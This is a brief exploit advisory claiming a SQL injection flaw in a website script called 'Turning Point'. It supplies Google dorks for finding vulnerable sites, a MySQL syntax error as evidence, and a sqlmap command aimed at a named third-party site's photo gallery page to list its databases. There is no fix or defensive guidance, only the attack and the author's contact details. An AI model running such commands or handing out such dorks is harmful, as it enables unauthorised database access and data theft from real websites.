*********************************************************
#Exploit Title: Turning Point script Sql Injection Vulnerability
#Date: 20.03.2021
#Exploit Author: Thor/Azerbaijan
#Google Dork: "Website designed by: Turning Point"
inurl:/"Website designed by: Turning Point"
intext:/"Website designed by: Turning Point"
#Tested OS: Linux/Parrot (SQLMAP TOOL)
ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
#iNJECT MODE: sqlmap -u http://stjgps.org/photo_gallery.php?pid=23 --dbs
*********************************************************
#Discovered by: Tural Asadov
#Instagram: @esedov__7.62
#Email: turalasadov915@gmail.com
*********************************************************